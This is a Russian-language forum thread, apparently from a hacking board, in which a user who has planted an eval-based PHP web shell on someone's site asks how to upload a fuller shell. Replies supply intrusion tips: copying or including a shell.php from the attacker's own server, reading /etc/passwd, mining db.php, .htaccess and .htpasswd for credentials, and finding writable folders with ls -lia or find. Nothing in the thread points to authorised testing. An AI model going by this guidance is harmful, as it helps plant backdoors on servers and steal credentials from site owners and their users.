залит eval('cmd') php шелл, но в чем проблема не понятно команда shell.php?cmd=passthru('uname'); выдаёт Linux а уже passthru('uname -a'); выдаёт пустой лист. Так же с 'ls' (выдает список файлов) и 'ls -a' (пустой лист), в итоге не могу залить нормальный шелл. Ни через php функцию copy, file_get_contents, ни через exec (wget); Подскажите в чем проблема, плиз.
passthru('uname+-a'); пустой лист. работает правильно, тогда вопрос как залить шелл в такой ситуации? copy(`http://moy sayt.com/shell.txt`,dirname(__FILE__).`/shell.php`); не срабатывает например
http://www.gnu.org/software/wget/manual/wget.html а еще можешь читать системные файлы если есть права print(`cat /etc/passwd`) определи полный путь к сайту и читай скрипты
не хочу читать, хочу писать смысл в shadow файлах? дай плиз php команду для залива, wget -o не срабатывает, GET тоже, fetch Не хочет, может я где не так пишу - напиши пример (гугль шарил, не помогло).
если можешь читать конфиг файлы увидишь много интересного, например admin.php,db.php,login.php или файлы .htaccess, .htpasswd ешо попробуй include("yoursite.com/shell.php"); или require()
такие кавычки нельзя использовать для опредления строк, только и для начала найди папки, куда писать можно командой ls -lia или find